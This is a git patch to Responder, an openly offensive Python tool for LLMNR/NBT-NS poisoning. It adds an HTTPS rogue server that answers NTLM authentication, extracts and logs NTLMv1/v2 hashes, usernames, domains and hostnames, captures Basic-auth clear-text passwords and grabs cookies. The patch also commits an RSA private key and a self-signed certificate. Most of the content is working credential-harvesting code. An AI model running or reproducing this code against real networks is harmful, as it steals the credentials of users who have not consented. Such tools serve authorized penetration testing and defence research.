From 92502814aa3becdd064f0bfb160af826adb42f60 Mon Sep 17 00:00:00 2001
From: Lgandx <lgaffie@trustwave.com>
Date: Thu, 28 Feb 2013 15:34:44 -0500
Subject: [PATCH] Added HTTPS module.

---
 Certs/gen-self-signed-cert.sh |   2 +
 Certs/responder.crt           |  19 +++++
 Certs/responder.key           |  27 +++++++
 Responder.py                  | 147 +++++++++++++++++++++++++++++++++-
 4 files changed, 193 insertions(+), 2 deletions(-)
 create mode 100755 Certs/gen-self-signed-cert.sh
 create mode 100644 Certs/responder.crt
 create mode 100644 Certs/responder.key

diff --git a/Certs/gen-self-signed-cert.sh b/Certs/gen-self-signed-cert.sh
new file mode 100755
index 0000000..e9f3c73
--- /dev/null
+++ b/Certs/gen-self-signed-cert.sh
@@ -0,0 +1,2 @@
+#!/bin/bash
+openssl genrsa -des3 -out responder.tmp.key 2048&&openssl rsa -in responder.tmp.key -out responder.key&&openssl req -new -key responder.key -out responder.csr&&openssl x509 -req -days 365 -in responder.csr -signkey responder.key -out responder.crt&&rm responder.tmp.key responder.csr
diff --git a/Certs/responder.crt b/Certs/responder.crt
new file mode 100644
index 0000000..ac239e8
--- /dev/null
+++ b/Certs/responder.crt
@@ -0,0 +1,19 @@
+-----BEGIN CERTIFICATE-----
+MIIDBjCCAe4CCQDDe8Sb2PGjITANBgkqhkiG9w0BAQUFADBFMQswCQYDVQQGEwJB
+VTETMBEGA1UECAwKU29tZS1TdGF0ZTEhMB8GA1UECgwYSW50ZXJuZXQgV2lkZ2l0
+cyBQdHkgTHRkMB4XDTEzMDIyODIwMTcxN1oXDTE0MDIyODIwMTcxN1owRTELMAkG
+A1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoMGEludGVybmV0
+IFdpZGdpdHMgUHR5IEx0ZDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEB
+AMQB5yErm0Sg7sRQbLgbi/hG/8uF2xUzvVKnT4LROEWkkimy9umb2JbvAZITDvSs
+r2xsPA4VoxFjKpWLOv7mAIMBR95NDWsTLuR36Sho/U2LlTlUBdSfQP7rlKQZ0L43
+YpXswdvCCJ0wP2yOhq0i71cg/Nk9mfQxftpgGUxoa+6ljU9hSdmThu2FVgAbSpNl
+D86rk4K9/sGYAY4btMqaMzC7JIKZp07FHL32oM01cKbRoNg2eUuQmoVjca1pkmbO
+Y8qnl7ajOjsiAPQnt/2TMJlRsdoU1fSx76Grgkm8D4gX/pBUqELdpvHtnm/9imPl
+qNGL5LaW8ARgG16U0mRhutkCAwEAATANBgkqhkiG9w0BAQUFAAOCAQEAS7u4LWc9
+wDPThD0o58Ti2GgIs+mMRx5hPaxWHJNCu+lwFqjvWmsNFfHoSzlIkIUjtlV2G/wE
+FxDSPlc/V+r7U2UiE7WSqQiWdmfOYS2m03x4SN0Vzf/n9DeApyPo2GsXGrha20eN
+s390Xwj6yKFdprUPJ8ezlEVRrAMv7tu1cOLzqmkocYKnPgXDdQxiiGisp7/hEUCQ
+B7HvNCMPbOi+M7O/CXbfgnTD029KkyiR2LEtj4QC5Ytp/pj0UyyoIeCK57CTB3Jt
+X3CZ+DiphTpOca4iENH55m6atk+WHYwg3ClYiONQDdIgKVT3BK0ITjyFWZeTneVu
+1eVgF/UkX9fqJg==
+-----END CERTIFICATE-----
diff --git a/Certs/responder.key b/Certs/responder.key
new file mode 100644
index 0000000..2b7cbc0
--- /dev/null
+++ b/Certs/responder.key
@@ -0,0 +1,27 @@
+-----BEGIN RSA PRIVATE KEY-----
+MIIEowIBAAKCAQEAxAHnISubRKDuxFBsuBuL+Eb/y4XbFTO9UqdPgtE4RaSSKbL2
+6ZvYlu8BkhMO9KyvbGw8DhWjEWMqlYs6/uYAgwFH3k0NaxMu5HfpKGj9TYuVOVQF
+1J9A/uuUpBnQvjdilezB28IInTA/bI6GrSLvVyD82T2Z9DF+2mAZTGhr7qWNT2FJ
+2ZOG7YVWABtKk2UPzquTgr3+wZgBjhu0ypozMLskgpmnTsUcvfagzTVwptGg2DZ5
+S5CahWNxrWmSZs5jyqeXtqM6OyIA9Ce3/ZMwmVGx2hTV9LHvoauCSbwPiBf+kFSo
+Qt2m8e2eb/2KY+Wo0YvktpbwBGAbXpTSZGG62QIDAQABAoIBABbuLg74XgLKXQSE
+cCOdvWM/Ux+JOlchpW1s+2VPeqjTFvJf6Hjt7YnCzkk7h41iQmeJxgDT0S7wjgPO
+tQkq+TZaSQEdvIshRGQgDxvWJIQU51E8ni4Ar4bjIpGMH5qROixV9VvzODTDdzgI
++IJ6ystDpbD4fvFNdQyxH2SL9syFRyWyxY3vWB0C/OHWxGFtiTtmeivBSmpxl0RY
+RQqPLxX+xUCie7U6ud3e37FO7cKt+YT8lWKhGHKJlTlJbHs1d8crzp6qKJLl+ibB
+0fB6D6E5M1fnIJFJULIYAG5bEak90KuKOKCLoKLG+rq0vUvJsb9vNCAA6rh1ra+n
+8woY8TECgYEA7CEE/3oWnziB3PZoIIJDgbBalCCbA+/SgDiSvYJELEApCMj8HYc5
+UGOxrfVhPmbHRUI982Fj1oM3QBEX0zpkOk7Xk224RXwBHG8MMPQmTMVp+o06AI6D
+Nggyam9v5KLNMj5KghKJSOD0tR5YxsZPXw4gAI+wpqu3bXGKZ8bRpvUCgYEA1ICJ
+H+kw6H8edJHGdNH+X6RR0DIbS11XQvbKQ3vh6LdHTofoHqQa3t0zGYCgksKJbtHV
+2h3pv+nuOu5FEP2rrGJIforv2zwfJ5vp65jePrSXU+Up4pMHbP1Rm91ApcKNA15U
+q3SaclqTjmiqvaeSKc4TDjdb/rUaIhyIgbg97dUCgYAcdq5/jVwEvW8KD7nlkU5J
+59RDXtrQ0qvxQOCPb5CANQu9P10EwjQqeJoGejnKp+EFfEKzf93lEdQrKORSVguW
+68IYx3UbCyOnJcu2avfi8TkhNrzzLDqs3LgXFG/Mg8NwdwnMPCfIXTWiT5IsA+O1
+daJt7uRAcxqdWr5wXAsRsQKBgFXU4Q4hm16dUcjVxKoU08D/1wfX5UxolEF4+zOM
+yy+7L7MZk/kkYbIY+HXZjYIZz3cSjGVAZdTdgRsOeJknTPsg65UpOz57Jz5RbId7
+xHDhcqoxSty4dGxiWV8yW9VYIqr0pBBo1aVQzn7b6fMWxyPZl7rLQ3462iZjDgQP
+TfxNAoGBAK/Gef6MgchbFPikOVEX9qB/wt4sS3V7mT6QkqMZZgSkegDLBFVRJX3w
+Emx/V2A14p0uHPzn5irURyJ6daZCN4amPAWYQnkiXG8saiBwtfs23A1q7kxnPR+b
+KJfb+nDlhU1iYa/7nf4PaR/i9l6gcwOeh1ThK1nq4VvwTaTZKSRh
+-----END RSA PRIVATE KEY-----
diff --git a/Responder.py b/Responder.py
index 0ed5e23..16ec6d8 100644
--- a/Responder.py
+++ b/Responder.py
@@ -20,7 +20,7 @@ import sys,struct,SocketServer,re,optparse,socket,thread,Fingerprint,random,os
 from Fingerprint import RunSmbFinger,OsNameClientVersion
 from odict import OrderedDict
 from socket import inet_aton
-from random import randrange, choice
+from random import randrange
 
 parser = optparse.OptionParser(usage='python %prog -i 10.20.30.40 -b 1 -s On -r 0',
                                prog=sys.argv[0],
@@ -31,6 +31,8 @@ parser.add_option('-b', '--basic',action="store", help="Set this to 1 if you wan
 
 parser.add_option('-s', '--http',action="store", help="Set this to On or Off to start/stop the HTTP server. Default value is On", metavar="Off",dest="on_off", choices=['On','Off'], default="On")
 
+parser.add_option('--ssl',action="store", help="Set this to On or Off to start/stop the HTTPS server. Default value is On", metavar="Off",dest="SSL_On_Off", choices=['On','Off'], default="On")
+
 parser.add_option('-S', '--smb',action="store", help="Set this to On or Off to start/stop the SMB server. Default value is On", metavar="Off",dest="SMB_on_off", choices=['On','Off'], default="On")
 
 parser.add_option('-q', '--sql',action="store", help="Set this to On or Off to start/stop the SQL server. Default value is On", metavar="Off",dest="SQL_on_off", choices=['On','Off'], default="On")
@@ -74,6 +76,7 @@ logging.warning('Responder Started')
 OURIP = options.OURIP
 Basic = options.Basic
 On_Off = options.on_off.upper()
+SSL_On_Off = options.SSL_On_Off.upper()
 SMB_On_Off = options.SMB_on_off.upper()
 SQL_On_Off = options.SQL_on_off.upper()
 FTP_On_Off = options.FTP_On_Off.upper()
@@ -113,7 +116,7 @@ Challenge = ""
 for i in range(0,len(NumChal),2):
     Challenge += NumChal[i:i+2].decode("hex")
 
-Show_Help("[+]NBT-NS & LLMNR responder started\nGlobal Parameters set:\nChallenge set is: %s\nWPAD Proxy Server is:%s\nHTTP Server is:%s\nSMB Server is:%s\nSMB LM support is set to:%s\nSQL Server is:%s\nFTP Server is:%s\nDNS Server is:%s\nLDAP Server is:%s\nFingerPrint Module is:%s\n"%(NumChal,WPAD_On_Off,On_Off,SMB_On_Off,LM_On_Off,SQL_On_Off,FTP_On_Off,DNS_On_Off,LDAP_On_Off,Finger_On_Off))
+Show_Help("[+]NBT-NS & LLMNR responder started\nGlobal Parameters set:\nChallenge set is: %s\nWPAD Proxy Server is:%s\nHTTP Server is:%s\nHTTPS Server is:%s\nSMB Server is:%s\nSMB LM support is set to:%s\nSQL Server is:%s\nFTP Server is:%s\nDNS Server is:%s\nLDAP Server is:%s\nFingerPrint Module is:%s\n"%(NumChal,WPAD_On_Off,On_Off,SSL_On_Off,SMB_On_Off,LM_On_Off,SQL_On_Off,FTP_On_Off,DNS_On_Off,LDAP_On_Off,Finger_On_Off))
 
 #Simple NBNS Services.
 W_REDIRECT   = "\x41\x41\x00"
@@ -1046,6 +1049,131 @@ class HTTPProxy(SocketServer.BaseRequestHandler):
            pass#No need to be verbose..
            self.request.close()
 
+##################################################################################
+#HTTPS Server
+##################################################################################
+from OpenSSL import SSL
+#Parse NTLMv1/v2 hash.
+def ParseHTTPSHash(data,client):
+    LMhashLen = struct.unpack('<H',data[12:14])[0]
+    LMhashOffset = struct.unpack('<H',data[16:18])[0]
+    LMHash = data[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
+    NthashLen = struct.unpack('<H',data[20:22])[0]
+    NthashOffset = struct.unpack('<H',data[24:26])[0]
+    NTHash = data[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
+    if NthashLen == 24:
+       print "[+]HTTPS NTLMv1 hash captured from :",client
+       logging.warning('[+]HTTPS NTLMv1 hash captured from :%s'%(client))
+       NtHash = data[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
+       HostNameLen = struct.unpack('<H',data[46:48])[0]
+       HostNameOffset = struct.unpack('<H',data[48:50])[0]
+       Hostname = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
+       print "Hostname is :", Hostname
+       logging.warning('[+]HTTPS NTLMv1 Hostname is :%s'%(Hostname))
+       UserLen = struct.unpack('<H',data[36:38])[0]
+       UserOffset = struct.unpack('<H',data[40:42])[0]
+       User = data[UserOffset:UserOffset+UserLen].replace('\x00','')
+       print "User is :", data[UserOffset:UserOffset+UserLen].replace('\x00','')
+       logging.warning('[+]HTTPS NTLMv1 User is :%s'%(data[UserOffset:UserOffset+UserLen].replace('\x00','')))
+       outfile = "HTTPS-NTLMv1-Client-"+client+".txt"
+       WriteHash = User+"::"+Hostname+":"+LMHash+":"+NtHash+":"+NumChal
+       WriteData(outfile,WriteHash, User+"::"+Hostname)
+       print "Complete hash is : ", WriteHash
+       logging.warning('[+]HTTPS NTLMv1 Complete hash is :%s'%(WriteHash))
+    if NthashLen > 24:
+       print "[+]HTTPS NTLMv2 hash captured from :",client
+       logging.warning('[+]HTTPS NTLMv2 hash captured from :%s'%(client))
+       NthashLen = 64
+       DomainLen = struct.unpack('<H',data[28:30])[0]
+       DomainOffset = struct.unpack('<H',data[32:34])[0]
+       Domain = data[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
+       print "Domain is : ", Domain
+       logging.warning('[+]HTTPS NTLMv2 Domain is :%s'%(Domain))
+       UserLen = struct.unpack('<H',data[36:38])[0]
+       UserOffset = struct.unpack('<H',data[40:42])[0]
+       User = data[UserOffset:UserOffset+UserLen].replace('\x00','')
+       print "User is :", User
+       logging.warning('[+]HTTPS NTLMv2 User is : %s'%(User))
+       HostNameLen = struct.unpack('<H',data[44:46])[0]
+       HostNameOffset = struct.unpack('<H',data[48:50])[0]
+       HostName =  data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
+       print "Hostname is :", HostName
+       logging.warning('[+]HTTPS NTLMv2 Hostname is :%s'%(HostName))
+       outfile = "HTTPS-NTLMv2-Client-"+client+".txt"
+       WriteHash = User+"::"+Domain+":"+NumChal+":"+NTHash[:32]+":"+NTHash[32:]
+       WriteData(outfile,WriteHash, User+"::"+Domain)
+       print "Complete hash is : ", WriteHash
+       logging.warning('[+]HTTPS NTLMv2 Complete hash is :%s'%(WriteHash))
+
+#Handle HTTPS packet sequence.
+def HTTPSPacketSequence(data,client):
+    a = re.findall('(?<=Authorization: NTLM )[^\\r]*', data)
+    b = re.findall('(?<=Authorization: Basic )[^\\r]*', data)
+    if a:
+       packetNtlm = b64decode(''.join(a))[8:9]
+       if packetNtlm == "\x01":
+          GrabCookie(data,client)
+          r = NTLM_Challenge(ServerChallenge=Challenge)
+          r.calculate()
+          t = IIS_NTLM_Challenge_Ans()
+          t.calculate(str(r))
+          buffer1 = str(t)                    
+          return buffer1
+       if packetNtlm == "\x03":
+          NTLM_Auth= b64decode(''.join(a))
+          ParseHTTPSHash(NTLM_Auth,client)
+          buffer1 = str(IIS_Auth_Granted())
+          return buffer1
+    if b:
+       GrabCookie(data,client)
+       outfile = "HTTPS-Clear-Text-Password-"+client+".txt"
+       WriteData(outfile,b64decode(''.join(b)), b64decode(''.join(b)))
+       print "[+]HTTPS-User & Password:", b64decode(''.join(b))
+       logging.warning('[+]HTTPS-User & Password: %s'%(b64decode(''.join(b))))
+       buffer1 = str(IIS_Auth_Granted())
+       return buffer1
+
+    else:
+       return str(Basic_Ntlm(Basic))
+
+class SSlSock(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
+    def __init__(self, server_address, RequestHandlerClass):
+        SocketServer.BaseServer.__init__(self, server_address, RequestHandlerClass)
+        ctx = SSL.Context(SSL.SSLv3_METHOD)
+        cert = 'Certs/responder.crt'
+        key =  'Certs/responder.key'
+        ctx.use_privatekey_file(key)
+        ctx.use_certificate_file(cert)
+        self.socket = SSL.Connection(ctx, socket.socket(self.address_family, self.socket_type))
+        self.server_bind()
+        self.server_activate()
+
+    def shutdown_request(self,request):
+        try:
+           request.shutdown()
+        except:
+           pass
+
+class DoSSL(SocketServer.StreamRequestHandler):
+    def setup(self):
+        self.exchange = self.request
+        self.rfile = socket._fileobject(self.request, "rb", self.rbufsize)
+        self.wfile = socket._fileobject(self.request, "wb", self.wbufsize)
+
+    def handle(self):
+        try:
+           while True:
+              data = self.exchange.recv(8092)
+              self.exchange.settimeout(0.5)
+              buff = WpadCustom(data,self.client_address[0])
+              if buff:
+                 self.exchange.send(buff)
+              else:
+                 buffer0 = HTTPSPacketSequence(data,self.client_address[0])      
+                 self.exchange.send(buffer0)
+        except:
+            pass
+
 ##################################################################################
 #FTP Stuff
 ##################################################################################
@@ -1201,6 +1329,13 @@ def Is_HTTP_On(on_off):
     if on_off == "OFF":
        return False
 
+#Function name self-explanatory
+def Is_HTTPS_On(SSL_On_Off):
+    if SSL_On_Off == "ON":
+       return thread.start_new(serve_thread_SSL,('', 443,DoSSL))
+    if SSL_On_Off == "OFF":
+       return False
+
 #Function name self-explanatory
 def Is_WPAD_On(on_off):
     if on_off == "ON":
@@ -1264,10 +1399,18 @@ def serve_thread_tcp(host, port, handler):
 	except:
 		print "Error starting TCP server on port " + str(port) + ". Check that you have the necessary permissions (i.e. root) and no other servers are running."
 
+def serve_thread_SSL(host, port, handler):
+	try:
+		server = SSlSock((host, port), handler)
+		server.serve_forever()
+	except:
+		print "Error starting TCP server on port " + str(port) + ". Check that you have the necessary permissions (i.e. root) and no other servers are running."
+
 def main():
     try:
       Is_FTP_On(FTP_On_Off)
       Is_HTTP_On(On_Off)
+      Is_HTTPS_On(SSL_On_Off)
       Is_WPAD_On(WPAD_On_Off)
       Is_SMB_On(SMB_On_Off)
       Is_SQL_On(SQL_On_Off)